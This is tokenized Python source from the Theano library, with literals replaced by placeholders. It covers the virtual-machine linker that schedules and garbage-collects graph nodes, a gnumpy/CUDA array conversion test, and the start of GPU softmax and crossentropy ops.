thunk , node , old_storage in zip ( self . thunks , self . nodes , <EOL> self . post_thunk_clear ) : <EOL> thunk ( ) <EOL> for old_s in old_storage : <EOL> old_s [ <NUM_LIT:0> ] = None <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> class Stack ( VM ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , fgraph , allow_gc , <EOL> dependencies = None , callback = None ) : <EOL> super ( Stack , self ) . __init__ ( nodes , thunks , pre_call_clear ) <EOL> self . allow_gc = allow_gc <EOL> self . message = "<STR_LIT>" <EOL> self . base_apply_stack = [ o . owner for o in fgraph . outputs if o . owner ] <EOL> self . outputs = fgraph . outputs <EOL> self . storage_map = storage_map <EOL> self . 
variable_shape = { } <EOL> self . variable_strides = { } <EOL> self . compute_map = compute_map <EOL> self . node_idx = node_idx = { } <EOL> self . callback = callback <EOL> ords = fgraph . orderings ( ) <EOL> for i , node in enumerate ( self . nodes ) : <EOL> node_idx [ node ] = i <EOL> node . destroy_dependencies = [ ] <EOL> if node in ords : <EOL> for prereq in ords [ node ] : <EOL> node . destroy_dependencies += prereq . outputs <EOL> self . dependencies = dependencies <EOL> if self . allow_gc and self . dependencies is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def run_thunk_of_node ( self , node ) : <EOL> """<STR_LIT>""" <EOL> idx = self . node_idx [ node ] <EOL> t0 = time . time ( ) <EOL> rval = self . thunks [ idx ] ( ) <EOL> self . node_executed_order . append ( node ) <EOL> dt = max ( time . time ( ) - t0 , <NUM_LIT> ) <EOL> if self . callback is not None : <EOL> self . callback ( <EOL> node = node , <EOL> thunk = self . thunks [ idx ] , <EOL> storage_map = self . storage_map , <EOL> compute_map = self . compute_map , <EOL> ) <EOL> return rval , dt <EOL> def __call__ ( self ) : <EOL> storage_map = self . storage_map <EOL> compute_map = self . compute_map <EOL> thunks = self . thunks <EOL> dependencies = self . dependencies <EOL> self . node_executed_order = [ ] <EOL> self . node_cleared_order = [ ] <EOL> for k in self . storage_map : <EOL> compute_map [ k ] [ <NUM_LIT:0> ] = ( k . owner is None ) <EOL> apply_stack = list ( self . base_apply_stack ) <EOL> last_apply_stack_len = - <NUM_LIT:1> <EOL> for var , data in iteritems ( self . storage_map ) : <EOL> if data [ <NUM_LIT:0> ] is None : <EOL> continue <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( data [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . 
variable_shape [ var ] = sh <EOL> st = getattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if getattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and data [ <NUM_LIT:0> ] . flags . c_contiguous : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> while apply_stack : <EOL> apply_stack_len = len ( apply_stack ) <EOL> assert apply_stack_len != last_apply_stack_len <EOL> last_apply_stack_len = apply_stack_len <EOL> current_apply = apply_stack . pop ( ) <EOL> current_inputs = current_apply . inputs <EOL> current_outputs = current_apply . outputs <EOL> current_deps = current_inputs + current_apply . destroy_dependencies <EOL> computed_ins = all ( compute_map [ v ] [ <NUM_LIT:0> ] for v in current_deps ) <EOL> computed_outs = all ( compute_map [ v ] [ <NUM_LIT:0> ] for v in current_outputs ) <EOL> if not thunks [ self . node_idx [ current_apply ] ] . lazy : <EOL> if computed_ins and not computed_outs : <EOL> try : <EOL> _ , dt = self . run_thunk_of_node ( current_apply ) <EOL> del _ <EOL> if config . profile : <EOL> current_idx = self . node_idx [ current_apply ] <EOL> self . call_counts [ current_idx ] += <NUM_LIT:1> <EOL> self . call_times [ current_idx ] += dt <EOL> for ( idx , o ) in enumerate ( <EOL> thunks [ self . node_idx [ <EOL> current_apply ] ] . outputs ) : <EOL> var = self . nodes [ current_idx ] . outputs [ idx ] <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( o [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . variable_shape [ var ] = sh <EOL> st = getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if ( getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and <EOL> o [ <NUM_LIT:0> ] . flags . 
c_contiguous ) : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> except Exception : <EOL> link . raise_with_op ( <EOL> current_apply , <EOL> self . thunks [ self . node_idx [ current_apply ] ] , <EOL> storage_map = storage_map ) <EOL> for o in current_apply . outputs : <EOL> compute_map [ o ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> input_index = [ ] <EOL> if self . allow_gc : <EOL> for i in current_apply . inputs : <EOL> if ( dependencies [ i ] and <EOL> i . owner and <EOL> i not in self . outputs ) : <EOL> if all ( compute_map [ v ] [ <NUM_LIT:0> ] <EOL> for v in dependencies [ i ] ) : <EOL> storage_map [ i ] [ <NUM_LIT:0> ] = None <EOL> input_index . append ( <EOL> current_apply . inputs . index ( i ) ) <EOL> compute_map [ i ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> if ( config . warn . vm_gc_bug and <EOL> current_apply in apply_stack and <EOL> getattr ( current_apply . op , <EOL> '<STR_LIT>' , <EOL> False ) ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:3> <EOL> ) <EOL> self . node_cleared_order . append ( input_index ) <EOL> elif not computed_ins : <EOL> apply_stack . append ( current_apply ) <EOL> apply_stack . extend ( inp . owner <EOL> for inp in current_deps <EOL> if inp . owner ) <EOL> elif not computed_outs : <EOL> try : <EOL> requires , dt = self . run_thunk_of_node ( current_apply ) <EOL> current_idx = self . node_idx [ current_apply ] <EOL> self . call_counts [ current_idx ] += <NUM_LIT:1> <EOL> self . call_times [ current_idx ] += dt <EOL> except Exception : <EOL> link . raise_with_op ( <EOL> current_apply , <EOL> self . thunks [ self . 
node_idx [ current_apply ] ] , <EOL> storage_map = storage_map ) <EOL> if requires : <EOL> for r in requires : <EOL> apply_stack . append ( current_apply ) <EOL> if current_apply . inputs [ r ] . owner : <EOL> apply_stack . append ( current_apply . inputs [ r ] . owner ) <EOL> else : <EOL> if config . profile : <EOL> for ( idx , o ) in enumerate ( thunks [ <EOL> self . node_idx [ current_apply ] ] . outputs ) : <EOL> var = self . nodes [ <EOL> self . node_idx [ current_apply ] ] . outputs [ idx ] <EOL> if hasattr ( var . type , '<STR_LIT>' ) : <EOL> sh = var . type . get_shape_info ( o [ <NUM_LIT:0> ] ) <EOL> else : <EOL> sh = '<STR_LIT>' <EOL> self . variable_shape [ var ] = sh <EOL> st = getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if ( getattr ( o [ <NUM_LIT:0> ] , '<STR_LIT>' , False ) and <EOL> o [ <NUM_LIT:0> ] . flags . c_contiguous ) : <EOL> st = '<STR_LIT:c>' <EOL> elif ( hasattr ( data [ <NUM_LIT:0> ] , '<STR_LIT>' ) and <EOL> data [ <NUM_LIT:0> ] . is_c_contiguous ( ) ) : <EOL> st = "<STR_LIT:c>" <EOL> self . variable_strides [ var ] = st <EOL> input_index = [ ] <EOL> if self . allow_gc : <EOL> for i in current_apply . inputs : <EOL> if ( dependencies [ i ] and i . owner and <EOL> i not in self . outputs ) : <EOL> empty_storage_map = True <EOL> for x in dependencies [ i ] : <EOL> if not compute_map [ x ] [ <NUM_LIT:0> ] : <EOL> empty_storage_map = False <EOL> break <EOL> if empty_storage_map : <EOL> storage_map [ i ] [ <NUM_LIT:0> ] = None <EOL> input_index . append ( <EOL> current_apply . inputs . index ( i ) ) <EOL> compute_map [ i ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> self . node_cleared_order . append ( input_index ) <EOL> final_index = [ ] <EOL> if self . allow_gc : <EOL> for v in storage_map : <EOL> if v . owner and v not in self . outputs : <EOL> if compute_map [ v ] [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> continue <EOL> else : <EOL> storage_map [ v ] [ <NUM_LIT:0> ] = None <EOL> final_index . 
append ( v ) <EOL> compute_map [ v ] [ <NUM_LIT:0> ] = <NUM_LIT:2> <EOL> self . node_cleared_order . append ( final_index ) <EOL> try : <EOL> from . import lazylinker_c <EOL> class CVM ( lazylinker_c . CLazyLinker , VM ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> lazylinker_c . CLazyLinker . __init__ ( self , * args , ** kwargs ) <EOL> except ImportError : <EOL> pass <EOL> except ( OSError , theano . gof . cmodule . MissingGXX ) as e : <EOL> assert not [ x for x in _config_var_list <EOL> if x . fullname == '<STR_LIT>' ] [ <NUM_LIT:0> ] . default . startswith ( '<STR_LIT>' ) , e <EOL> pass <EOL> class VM_Linker ( link . LocalLinker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , allow_gc = None , use_cloop = False , callback = None , <EOL> lazy = None , schedule = None , c_thunks = None ) : <EOL> if allow_gc is None : <EOL> allow_gc = config . allow_gc <EOL> self . fgraph = None <EOL> self . allow_gc = allow_gc <EOL> self . use_cloop = use_cloop <EOL> self . callback = callback <EOL> self . lazy = lazy <EOL> self . c_thunks = c_thunks <EOL> self . updated_vars = { } <EOL> if schedule : <EOL> self . schedule = schedule <EOL> def accept ( self , fgraph , no_recycling = None ) : <EOL> """<STR_LIT>""" <EOL> if ( config . profile and <EOL> hasattr ( theano , '<STR_LIT>' ) and <EOL> hasattr ( theano . sandbox , '<STR_LIT>' ) and <EOL> theano . sandbox . cuda . cuda_enabled ) : <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) != '<STR_LIT:1>' : <EOL> raise Exception ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if no_recycling is None : <EOL> no_recycling = [ ] <EOL> if self . fgraph is not None and self . fgraph is not fgraph : <EOL> return type ( self ) ( <EOL> allow_gc = self . allow_gc , <EOL> use_cloop = self . use_cloop , <EOL> callback = self . callback , <EOL> lazy = self . lazy , <EOL> schedule = self . schedule , <EOL> c_thunks = self . c_thunks , <EOL> ) . 
accept ( fgraph , no_recycling ) <EOL> self . fgraph = fgraph <EOL> self . no_recycling = no_recycling <EOL> return self <EOL> def accept_var_updates ( self , updated_vars ) : <EOL> self . updated_vars = updated_vars <EOL> def compute_gc_dependencies ( self , variables ) : <EOL> """<STR_LIT>""" <EOL> dependencies = { } <EOL> for k in variables : <EOL> dependencies [ k ] = [ ] <EOL> if k . owner and k . clients : <EOL> ls = [ ] <EOL> for cl in k . clients : <EOL> if cl [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> ls += cl [ <NUM_LIT:0> ] . outputs <EOL> dependencies [ k ] += ls <EOL> return dependencies <EOL> def make_vm ( self , nodes , thunks , <EOL> input_storage , output_storage , storage_map , <EOL> post_thunk_clear , <EOL> computed , <EOL> compute_map , <EOL> updated_vars , <EOL> ) : <EOL> pre_call_clear = [ storage_map [ v ] for v in self . no_recycling ] <EOL> if ( self . callback is not None or <EOL> ( config . profile and config . profile_memory ) ) : <EOL> if self . use_cloop and self . callback is not None : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> if self . use_cloop and config . profile_memory : <EOL> warnings . warn ( <EOL> '<STR_LIT>' ) <EOL> deps = self . compute_gc_dependencies ( storage_map ) <EOL> vm = Stack ( <EOL> nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , <EOL> self . fgraph , self . allow_gc , <EOL> dependencies = deps , <EOL> callback = self . callback ) <EOL> elif self . use_cloop : <EOL> nodes_idx = { } <EOL> vars_idx = { } <EOL> for i , node in enumerate ( nodes ) : <EOL> nodes_idx [ node ] = i <EOL> for v in node . inputs + node . outputs : <EOL> vars_idx . setdefault ( v , len ( vars_idx ) ) <EOL> for v in self . fgraph . inputs + self . fgraph . outputs : <EOL> vars_idx . 
setdefault ( v , len ( vars_idx ) ) <EOL> nodes_idx_inv = { } <EOL> vars_idx_inv = { } <EOL> for ( node , i ) in iteritems ( nodes_idx ) : <EOL> nodes_idx_inv [ i ] = node <EOL> for ( var , i ) in iteritems ( vars_idx ) : <EOL> vars_idx_inv [ i ] = var <EOL> storage_map_list = [ storage_map [ vars_idx_inv [ i ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> compute_map_list = [ compute_map [ vars_idx_inv [ i ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> if nodes : <EOL> assert type ( storage_map_list [ <NUM_LIT:0> ] ) is list <EOL> assert type ( compute_map_list [ <NUM_LIT:0> ] ) is list <EOL> dependency_map = self . compute_gc_dependencies ( storage_map ) <EOL> dependency_map_list = [ <EOL> [ vars_idx [ d ] for d in dependency_map [ vars_idx_inv [ i ] ] ] <EOL> for i in xrange ( len ( vars_idx_inv ) ) ] <EOL> base_input_output_list = [ ] <EOL> node_n_inputs = [ ] <EOL> node_n_outputs = [ ] <EOL> node_input_offset = [ ] <EOL> node_output_offset = [ ] <EOL> for node in nodes : <EOL> inputs_idx = [ vars_idx [ v ] for v in node . inputs ] <EOL> outputs_idx = [ vars_idx [ v ] for v in node . outputs ] <EOL> node_n_inputs . append ( len ( inputs_idx ) ) <EOL> node_n_outputs . append ( len ( outputs_idx ) ) <EOL> node_input_offset . append ( len ( base_input_output_list ) ) <EOL> base_input_output_list . extend ( inputs_idx ) <EOL> node_output_offset . append ( len ( base_input_output_list ) ) <EOL> base_input_output_list . extend ( outputs_idx ) <EOL> var_owner = [ None ] * len ( vars_idx ) <EOL> for ( var , i ) in iteritems ( vars_idx ) : <EOL> if var . owner : <EOL> var_owner [ i ] = nodes_idx [ var . owner ] <EOL> is_lazy_list = [ int ( th . lazy ) for th in thunks ] <EOL> output_vars = [ vars_idx [ v ] for v in self . fgraph . outputs ] <EOL> ords = self . fgraph . orderings ( ) <EOL> node_prereqs = [ ] <EOL> node_output_size = [ ] <EOL> for i , node in enumerate ( nodes ) : <EOL> node_output_size . 
append ( <NUM_LIT:0> ) <EOL> prereq_var_idxs = [ ] <EOL> for prereq_node in ords . get ( node , [ ] ) : <EOL> prereq_var_idxs . extend ( <EOL> [ vars_idx [ v ] for v in prereq_node . outputs ] ) <EOL> prereq_var_idxs = list ( set ( prereq_var_idxs ) ) <EOL> prereq_var_idxs . sort ( ) <EOL> node_prereqs . append ( prereq_var_idxs ) <EOL> update_storage = [ ] <EOL> update_in_from_out = { } <EOL> for ( ivar , ovar ) in iteritems ( updated_vars ) : <EOL> update_in_from_out [ vars_idx [ ovar ] ] = vars_idx [ ivar ] <EOL> for oidx in output_vars : <EOL> if oidx in update_in_from_out : <EOL> update_storage . append ( update_in_from_out [ oidx ] ) <EOL> c0 = sys . getrefcount ( node_n_inputs ) <EOL> vm = CVM ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> allow_gc = self . allow_gc , <EOL> call_counts = [ <NUM_LIT:0> ] * len ( nodes ) , <EOL> call_times = [ <NUM_LIT:0.0> ] * len ( nodes ) , <EOL> compute_map_list = compute_map_list , <EOL> storage_map_list = storage_map_list , <EOL> base_input_output_list = base_input_output_list , <EOL> node_n_inputs = node_n_inputs , <EOL> node_n_outputs = node_n_outputs , <EOL> node_input_offset = node_input_offset , <EOL> node_output_offset = node_output_offset , <EOL> var_owner = var_owner , <EOL> is_lazy_list = is_lazy_list , <EOL> output_vars = output_vars , <EOL> node_prereqs = node_prereqs , <EOL> node_output_size = node_output_size , <EOL> update_storage = update_storage , <EOL> dependencies = dependency_map_list , <EOL> ) <EOL> assert c0 == sys . getrefcount ( node_n_inputs ) <EOL> else : <EOL> lazy = self . lazy <EOL> if lazy is None : <EOL> lazy = config . vm . lazy <EOL> if lazy is None : <EOL> lazy = not all ( [ ( not th . lazy ) for th in thunks ] ) <EOL> if not lazy : <EOL> if self . 
allow_gc : <EOL> vm = LoopGC ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> post_thunk_clear , <EOL> ) <EOL> else : <EOL> vm = Loop ( <EOL> nodes , <EOL> thunks , <EOL> pre_call_clear , <EOL> ) <EOL> else : <EOL> deps = self . compute_gc_dependencies ( storage_map ) <EOL> vm = Stack ( <EOL> nodes , thunks , pre_call_clear , <EOL> storage_map , compute_map , <EOL> self . fgraph , self . allow_gc , <EOL> dependencies = deps <EOL> ) <EOL> return vm <EOL> def make_all ( self , profiler = None , input_storage = None , <EOL> output_storage = None , storage_map = None , <EOL> ) : <EOL> fgraph = self . fgraph <EOL> order = self . schedule ( fgraph ) <EOL> no_recycling = self . no_recycling <EOL> input_storage , output_storage , storage_map = link . map_storage ( <EOL> fgraph , order , input_storage , output_storage , storage_map ) <EOL> compute_map = { } <EOL> for k in storage_map : <EOL> compute_map [ k ] = [ k . owner is None ] <EOL> thunks = [ ] <EOL> compute_map_re = defaultdict ( lambda : [ <NUM_LIT:0> ] ) <EOL> for var in fgraph . inputs : <EOL> compute_map_re [ var ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> if getattr ( fgraph . profile , '<STR_LIT>' , None ) : <EOL> dependencies = getattr ( fgraph . profile , '<STR_LIT>' ) <EOL> else : <EOL> dependencies = self . compute_gc_dependencies ( storage_map ) <EOL> reallocated_info = calculate_reallocate_info ( <EOL> order , fgraph , storage_map , compute_map_re , dependencies ) <EOL> for node in order : <EOL> try : <EOL> if self . c_thunks is False : <EOL> node . op . _op_use_c_code = False <EOL> thunks . append ( node . op . make_thunk ( node , <EOL> storage_map , <EOL> compute_map , <EOL> no_recycling ) ) <EOL> if not hasattr ( thunks [ - <NUM_LIT:1> ] , '<STR_LIT>' ) : <EOL> thunks [ - <NUM_LIT:1> ] . lazy = False <EOL> except Exception as e : <EOL> e . args = ( "<STR_LIT>" <EOL> "<STR_LIT>" , node , "<STR_LIT:\n>" ) + e . args <EOL> raise <EOL> for node , thunk in zip ( order , thunks ) : <EOL> thunk . 
inputs = [ storage_map [ v ] for v in node . inputs ] <EOL> thunk . outputs = [ storage_map [ v ] for v in node . outputs ] <EOL> lazy = self . lazy <EOL> if lazy is None : <EOL> lazy = config . vm . lazy <EOL> if lazy is None : <EOL> lazy = not all ( [ ( not th . lazy ) for th in thunks ] ) <EOL> if not ( lazy or ( config . profile and config . profile_memory ) or <EOL> self . use_cloop or self . callback ) : <EOL> for pair in itervalues ( reallocated_info ) : <EOL> storage_map [ pair [ <NUM_LIT:1> ] ] = storage_map [ pair [ <NUM_LIT:0> ] ] <EOL> computed , last_user = link . gc_helper ( order ) <EOL> if self . allow_gc : <EOL> post_thunk_clear = [ ] <EOL> for node in order : <EOL> clear_after_this_thunk = [ ] <EOL> for input in node . inputs : <EOL> if ( input in computed and <EOL> input not in fgraph . outputs and <EOL> node == last_user [ input ] and <EOL> input not in reallocated_info ) : <EOL> clear_after_this_thunk . append ( storage_map [ input ] ) <EOL> post_thunk_clear . append ( clear_after_this_thunk ) <EOL> else : <EOL> post_thunk_clear = None <EOL> vm = self . make_vm ( order , thunks , <EOL> input_storage , output_storage , storage_map , <EOL> post_thunk_clear , <EOL> computed , <EOL> compute_map , <EOL> self . updated_vars , <EOL> ) <EOL> vm . storage_map = storage_map <EOL> return ( vm , <EOL> [ link . Container ( input , storage ) <EOL> for input , storage in zip ( fgraph . inputs , input_storage ) ] , <EOL> [ link . Container ( output , storage , True ) <EOL> for output , storage in zip ( fgraph . outputs , output_storage ) ] , <EOL> thunks , <EOL> order ) <EOL> def __setstate__ ( self , d ) : <EOL> self . __dict__ . update ( d ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . c_thunks = True </s>
<s> import numpy <EOL> import theano <EOL> from theano . misc . gnumpy_utils import gnumpy_available <EOL> if not gnumpy_available : <EOL> from nose . plugins . skip import SkipTest <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> from theano . misc . gnumpy_utils import ( garray_to_cudandarray , <EOL> cudandarray_to_garray ) <EOL> import gnumpy <EOL> def test ( shape = ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) : <EOL> """<STR_LIT>""" <EOL> gpu = theano . sandbox . cuda . basic_ops . gpu_from_host <EOL> U = gpu ( theano . tensor . ftensor3 ( '<STR_LIT>' ) ) <EOL> ii = theano . function ( [ U ] , gpu ( U + <NUM_LIT:1> ) ) <EOL> A = gnumpy . rand ( * shape ) <EOL> A_cnd = garray_to_cudandarray ( A ) <EOL> assert A_cnd . shape == A . shape <EOL> B_cnd = ii ( A_cnd ) <EOL> B = cudandarray_to_garray ( B_cnd ) <EOL> assert A_cnd . shape == A . shape <EOL> from numpy import array <EOL> u = ( A + <NUM_LIT:1> ) . asarray ( ) <EOL> v = B . asarray ( ) <EOL> w = array ( B_cnd ) <EOL> assert ( u == v ) . all ( ) <EOL> assert ( u == w ) . all ( ) <EOL> def test2 ( shape = ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) : <EOL> """<STR_LIT>""" <EOL> gpu = theano . sandbox . cuda . basic_ops . gpu_from_host <EOL> U = gpu ( theano . tensor . ftensor3 ( '<STR_LIT>' ) ) <EOL> ii = theano . function ( [ U ] , gpu ( U + <NUM_LIT:1> ) ) <EOL> A = numpy . random . rand ( * shape ) . astype ( '<STR_LIT>' ) <EOL> A_cnd = theano . sandbox . cuda . CudaNdarray ( A ) <EOL> A_gar = cudandarray_to_garray ( A_cnd ) <EOL> assert A_cnd . shape == A_gar . shape <EOL> B = garray_to_cudandarray ( A_gar ) <EOL> assert A_cnd . shape == B . shape <EOL> assert A_cnd . _strides == B . _strides <EOL> assert A_cnd . gpudata == B . gpudata <EOL> v = numpy . asarray ( B ) <EOL> assert ( v == A ) . 
all ( ) <EOL> def test_broadcast_dims ( ) : <EOL> """<STR_LIT>""" <EOL> test ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> test ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> test ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> test2 ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> test2 ( ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> test2 ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> ) ) </s>
<s> from __future__ import print_function <EOL> from theano import Op , Apply <EOL> from six import StringIO <EOL> from theano . sandbox . cuda import GpuOp <EOL> from theano . sandbox . cuda . basic_ops import as_cuda_ndarray_variable <EOL> from theano . sandbox . cuda . kernel_codegen import ( nvcc_kernel , <EOL> inline_softmax , <EOL> inline_softmax_fixed_shared ) <EOL> class GpuCrossentropySoftmaxArgmax1HotWithBias ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:3> <EOL> nout = <NUM_LIT:3> <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x , b , y_idx ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> b = as_cuda_ndarray_variable ( b ) <EOL> y_idx = as_cuda_ndarray_variable ( y_idx ) <EOL> nll = y_idx . type ( ) <EOL> sm = x . type ( ) <EOL> am = y_idx . type ( ) <EOL> return Apply ( self , [ x , b , y_idx ] , [ nll , sm , am ] ) <EOL> def c_headers ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> def c_support_code ( self ) : <EOL> return """<STR_LIT>""" <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , b , y_idx = inp <EOL> nll , sm , am = out <EOL> classname = self . __class__ . __name__ <EOL> fail = sub [ '<STR_LIT>' ] <EOL> sio = StringIO ( ) <EOL> print ( """<STR_LIT>""" % locals ( ) , file = sio ) <EOL> return sio . getvalue ( ) <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:5> , ) <EOL> gpu_crossentropy_softmax_argmax_1hot_with_bias = GpuCrossentropySoftmaxArgmax1HotWithBias ( ) <EOL> class GpuCrossentropySoftmax1HotWithBiasDx ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:3> <EOL> nout = <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> Op . 
__init__ ( self , ** kwargs ) <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , dy , sm , y_idx ) : <EOL> dy = as_cuda_ndarray_variable ( dy ) <EOL> sm = as_cuda_ndarray_variable ( sm ) <EOL> y_idx = as_cuda_ndarray_variable ( y_idx ) <EOL> return Apply ( self , [ dy , sm , y_idx ] , [ sm . type ( ) ] ) <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:8> , ) <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> dnll , sm , y_idx = inp <EOL> dx , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> return """<STR_LIT>""" % locals ( ) <EOL> gpu_crossentropy_softmax_1hot_with_bias_dx = GpuCrossentropySoftmax1HotWithBiasDx ( ) <EOL> class GpuSoftmax ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> return Apply ( self , [ x ] , [ x . type ( ) ] ) <EOL> def infer_shape ( self , node , shape ) : <EOL> return shape <EOL> def c_code_cache_version ( self ) : <EOL> return ( <NUM_LIT:9> , ) + inline_softmax . 
code_version <EOL> def c_code ( self , node , nodename , inp , out , sub ) : <EOL> x , = inp <EOL> z , = out <EOL> fail = sub [ '<STR_LIT>' ] <EOL> return """<STR_LIT>""" % locals ( ) <EOL> def c_support_code_apply ( self , node , nodename ) : <EOL> ret1 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> ret2 = nvcc_kernel ( "<STR_LIT>" % nodename , <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> body = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> inline_softmax_fixed_shared ( '<STR_LIT:N>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT:}>" , <EOL> ] ) <EOL> return ret1 + "<STR_LIT:\n>" + ret2 <EOL> gpu_softmax = GpuSoftmax ( ) <EOL> class GpuSoftmaxWithBias ( GpuOp ) : <EOL> """<STR_LIT>""" <EOL> nin = <NUM_LIT:2> <EOL> nout = <NUM_LIT:1> <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( type ( self ) ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> def make_node ( self , x , b ) : <EOL> x = as_cuda_ndarray_variable ( x ) <EOL> return Apply ( self , [ x , b ] , [ x . 
